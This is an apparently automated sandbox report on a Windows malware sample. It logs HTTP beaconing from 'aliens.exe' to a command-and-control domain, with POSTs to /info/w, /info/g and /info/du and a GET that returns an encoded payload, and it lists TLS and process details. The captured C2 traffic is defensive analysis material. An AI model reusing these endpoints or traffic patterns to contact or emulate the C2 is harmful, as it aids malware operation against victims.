                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 677
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:42:59.278107882 CET4259INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:42:59 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d696391eb5a20a19c3eb6a572057a66cd1607154177; expires=Mon, 04-Jan-21 07:42:57 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373af9100004120ce08e000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YwISspKcmN7Y405nkM4isjNKKK2Zb1DmWM8IippHWMqcmFi%2BAhA%2BfSO%2BKmOt9cCLMwDPBrKuY6oVMVhU5RxZOEpIKoMOQzLB1b2yPEW6SxmTWFVahw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc222c1a814120-PRG
                                                                                                                                                  Data Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                  Data Ascii: 11
                                                                                                                                                  Dec 5, 2020 08:42:59.316557884 CET4260OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:02.855652094 CET4262INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dd93d0f420e7a6c60eb5dae47e64e84391607154179; expires=Mon, 04-Jan-21 07:42:59 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373b50000004120fda51000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3zvH0rPrkWrkKbxJeXAIVNMngRqjD7U9LanAYk0q7BjdF%2B5y2tc9VnF%2FPENZRbiTGQUkJ%2BFNu5qcXVcw6lPPG%2BrnXOSa6gLFLXk%2FeIqWX5%2B%2Bq2tbQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2234cf8a4120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:03.095493078 CET4262OUTPOST /info/g HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 1405
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:04.337274075 CET4265INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:04 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d111cdcac6d047e629428e7b4c99708761607154183; expires=Mon, 04-Jan-21 07:43:03 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373c3dd00004120f801f000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zv7DK1KDGTiyLMdaPnp0rxO8Mqva%2BBSUPFmxm7%2FirxdEYXzpKXfzH51PewZ8vLW5z2UM2T06U%2FtlrdEk9y4BfI7sLA3vT5Wc1N9FVu2DuL2j0ZSDEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc224c7bce4120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
Dec 5, 2020 08:43:04.348758936 CET | 4266 | OUT | POST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:07.258394003 CET | 4267 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:07 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d8d9d37752442a3b202bea83cb00d4f8c1607154184; expires=Mon, 04-Jan-21 07:43:04 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373c8a900004120d81f9000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ETZjUdcpCwC%2BZivTgIHk0X22ERLHufV0Eehw%2FhiFdX8nDMv%2FDK8jQfx1TSKN0LTxWJb%2ByK%2FFVxDwJXLqE7qMtkvhzZ5QcGyRi35%2BlabW%2BOAK%2B6jZ7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc225448194120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
Dec 5, 2020 08:43:07.292275906 CET | 4267 | OUT | GET /info/r HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:08.427812099 CET | 4268 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:08 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d0cd7da8d808be268c8436cfafaea59c31607154187; expires=Mon, 04-Jan-21 07:43:07 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373d42800004120d8aae000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VSlmuNTBv7okEoCH4i32AqgNsMk48HhR%2FzV0NK4M4bGJoIQpVkqtZXWyQBfsJtJKoy%2F3GhzrbfNMoFqGSsCS1QtSl3kuAl60M5S%2FTOp%2FxQk%2FKOJ8DA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2266abb64120-PRG
                                                                                                                                                  Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a
                                                                                                                                                  Data Ascii: c6mtnVXGhd10~
Dec 5, 2020 08:43:30.096564054 CET | 4276 | OUT | POST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:34.401576996 CET | 4279 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:34 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d410e765879973c765abf01de61c2fa491607154210; expires=Mon, 04-Jan-21 07:43:30 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d3742d3d000041203d8a5000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YToItkX0sS8Vefjg5Y4oykJAC5lYUzPoLhWw376XPEfrTfOTze7li9lzAxyMQzPzzYfQ%2FGxqd%2BTVLracm4fbptQWlv4HGRKTeoKkg6Rs5ZK1wD1oFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc22f529e34120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
Dec 5, 2020 08:43:57.305152893 CET | 7827 | OUT | POST /info/du HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 125
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:58.680834055 CET | 7843 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d911a86354a154f4d45bff8c6f16ad1131607154237; expires=Mon, 04-Jan-21 07:43:57 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d374978500004120da910000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tw3sB28BceV52SsEyjr%2BhBHIHnnD2mTSvqzz3DG3rdDxEWSgO7egRAh3pKqjgZAvPzHV3a9KCUGlanchXyiHlPi8drdtLRm3ztuHjDSDBSl6sekExg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc239f3b904120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49740 | 104.28.4.129 | 80 | C:\Program Files (x86)\71eza90awf48\aliens.exe
Timestamp | kBytes transferred | Direction | Data
Dec 5, 2020 08:43:28.448842049 CET | 4275 | OUT | POST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:32.399786949 CET | 4277 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:32 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dbda57ca824670aeb15962b7f96e3302a1607154208; expires=Mon, 04-Jan-21 07:43:28 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37426d0000027bc0b12b000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TbvyRibHa2c3bNnK1im0hqyUzcf03R79kf4PqGuyPXplybVNb8gS97Px9aT%2FdeUN%2BfWXd%2FHImfvbX6HvaVmDXmoCakq6BpmJQU66OqBtKbhpRVK0vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc22eae9d227bc-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49741 | 104.28.4.129 | 80 | C:\Program Files (x86)\71eza90awf48\aliens.exe
Timestamp | kBytes transferred | Direction | Data
Dec 5, 2020 08:43:33.103669882 CET | 4278 | OUT | POST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:36.861763954 CET | 4280 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:36 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d6ab65dbae494ae6d92ea824b1843e9691607154213; expires=Mon, 04-Jan-21 07:43:33 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37438fb0000412c93a51000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=IgDBf%2B5RvUoWP105LTZAwqQGdaWeiQSee%2BwvYyovuy4XJvAihBlpA0moSin89G5pWrLlT1KuOsDIEYrCu9ofQnegXZYtj1j9EM3vy6kxyWZFjTzvKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2307f93c412c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
Dec 5, 2020 08:43:40.024529934 CET | 4341 | OUT | POST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
Dec 5, 2020 08:43:43.565794945 CET | 4848 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:43 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d0e507f4c0f150e265543a4b9cde0694c1607154220; expires=Mon, 04-Jan-21 07:43:40 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37454040000412cf40b5000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YgtztI7FjnIJJzB9ajN28lFuCQiHi8rQ2P8v6WX9Xp1NJWFmd7%2FbIWO%2FwtLlyLLGQsKyzIWjO1vvyqkBe6%2FbAQmeD%2FY3i0WeIGgXqNGso6rQlS0YQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc23333db7412c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49749 | 104.28.4.129 | 80 | C:\Program Files (x86)\71eza90awf48\aliens.exe
Timestamp | kBytes transferred | Direction | Data
Dec 5, 2020 08:43:43.650659084 CET | 4849 | OUT | GET /info/ddd HTTP/1.1
                                                                                                                                                  Host: EF6DF4AF06BA6896.xyz
                                                                                                                                                  Accept: */*
Dec 5, 2020 08:43:44.997695923 CET | 5053 | IN | HTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:44 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=de632e683c144605b22411be5233876341607154223; expires=Mon, 04-Jan-21 07:43:43 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d374622e0000278cd63bb000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MON8MExJN870FwT45Tf%2B5uHZ0HmE9BKb2%2FpyIiL277bSvhUNGRlXMqeIEPbRzspy2LsUVqoWFLoWSmu7HRg91Yo3Bt2aqALo3HWSZNtrj73HUtJEnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2349ebdd278c-PRG
                                                                                                                                                  Data Raw: 32 32 63 0d 0a 78 68 75 70 66 71 73 6d 67 6e 58 47 55 33 71 74 2d 69 59 44 75 70 33 44 69 42 46 51 4a 6f 63 62 56 5f 71 5f 4e 48 30 38 74 53 4a 39 61 34 41 42 67 76 46 68 4b 7a 58 35 76 6c 72 72 65 4f 30 7a 38 56 6b 34 64 6f 47 38 59 6d 43 30 4e 4f 5f 57 67 36 49 78 48 70 49 48 4f 4a 6f 6b 71 6a 4d 4b 51 54 34 6f 5f 76 39 59 78 54 57 79 56 6e 6f 77 37 56 54 59 4d 68 4f 74 71 6f 38 43 58 37 67 6a 51 77 30 70 59 38 62 52 39 33 59 39 57 71 68 31 4f 2d 76 79 36 4c 4a 49 45 4f 4e 74 6d 57 66 58 62 62 55 76 6d 68 49 68 56 47 71 52 6b 72 62 78 36 36 32 71 4a 5f 30 4b 50 53 67 4c 79 38 49 74 67 5a 77 58 75 38 49 33 42 6e 7a 64 30 6f 70 4a 30 4b 51 31 35 57 74 51 49 6a 56 6e 6a 48 71 66 33 43 64 42 59 53 4c 77 4e 76 37 54 43 68 6d 6c 48 69 50 6e 54 65 6a 48 72 43 34 4e 42 70 6e 30 57 6a 79 56 41 37 7a 68 43 34 51 33 65 76 41 74 32 73 6a 42 35 71 65 48 75 4a 6c 48 61 63 61 38 38 72 36 78 5a 43 61 4a 32 66 6d 33 65 70 77 41 42 47 68 49 51 6e 76 76 48 70 31 42 6e 73 53 79 6f 79 45 41 49 55 6e 50 59 6f 56 33 66 32 39 32 56 55 6a 6d 65 79 73 7a 63 72 74 36 39 32 45 35 6f 44 7a 37 63 41 64 6d 41 5a 70 74 6d 69 4b 54 56 31 77 51 42 55 66 53 34 43 6f 64 37 70 4e 4f 76 4a 4c 62 45 36 5f 56 47 6c 44 75 41 45 53 4c 6e 6f 62 36 75 48 41 31 74 6b 65 6d 75 2d 61 79 68 6d 46 32 46 6a 7a 44 4d 59 76 47 30 46 30 43 5a 58 76 78 35 67 76 6a 6a 52 59 47 6c 59 36 70 74 36 6d 46 6f 67 64 31 69 64 67 6c 4b 54 66 69 5a 71 58 63 69 61 38 54 39 39 68 50 62 62 68 77 52 4a 70 71 63 49 31 51 55 6a 66 4b 55 51 2d 4c 73 5a 62 46 6c 52 46 6d 66 4a 6f 4e 52 78 6d 4c 55 6d 67 4f 45 4e 68 6d 4c 37 69 4e 78 7a 55 46 62 55 61 79 46 36 54 53 47 52 36 66 64 66 74 41 52 72 41 74 70 5a 32 46 62 6a 38 7e 0d 0a
                                                                                                                                                  Data Ascii: 22cxhupfqsmgnXGU3qt-iYDup3DiBFQJocbV_q_NH08tSJ9a4ABgvFhKzX5vlrreO0z8Vk4doG8YmC0NO_Wg6IxHpIHOJokqjMKQT4o_v9YxTWyVnow7VTYMhOtqo8CX7gjQw0pY8bR93Y9Wqh1O-vy6LJIEONtmWfXbbUvmhIhVGqRkrbx662qJ_0KPSgLy8ItgZwXu8I3Bnzd0opJ0KQ15WtQIjVnjHqf3CdBYSLwNv7TChmlHiPnTejHrC4NBpn0WjyVA7zhC4Q3evAt2sjB5qeHuJlHaca88r6xZCaJ2fm3epwABGhIQnvvHp1BnsSyoyEAIUnPYoV3f292VUjmeyszcrt692E5oDz7cAdmAZptmiKTV1wQBUfS4Cod7pNOvJLbE6_VGlDuAESLnob6uHA1tkemu-ayhmF2FjzDMYvG0F0CZXvx5gvjjRYGlY6pt6mFogd1idglKTfiZqXcia8T99hPbbhwRJpqcI1QUjfKUQ-LsZbFlRFmfJoNRxmLUmgOENhmL7iNxzUFbUayF6TSGR6fdftARrAtpZ2Fbj8~


                                                                                                                                                  HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Dec 5, 2020 08:43:12.476727009 CET | 172.67.142.39 | 443 | 192.168.2.3 | 49739 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Thu Sep 24 02:00:00 CEST 2020 | Fri Sep 24 14:00:00 CEST 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877
(issuing CA in the same chain) | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | |

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior


                                                                                                                                                  System Behavior

                                                                                                                                                  General

Start time: 08:40:22
Start date: 05/12/2020
Path: C:\Users\user\Desktop\h1GodtbhC8.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Imagebase: 0x400000
File size: 4671378 bytes
MD5 hash: 3CA6DF4914385EFD4BA9CD239B5ED254
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

                                                                                                                                                  General

Start time: 08:40:23
Start date: 05/12/2020
Path: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Imagebase: 0x1210000
File size: 4387715 bytes
MD5 hash: 69C9BA53239D6838D05594D96A36DEA3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                                                                                                  General

Start time: 08:41:29
Start date: 05/12/2020
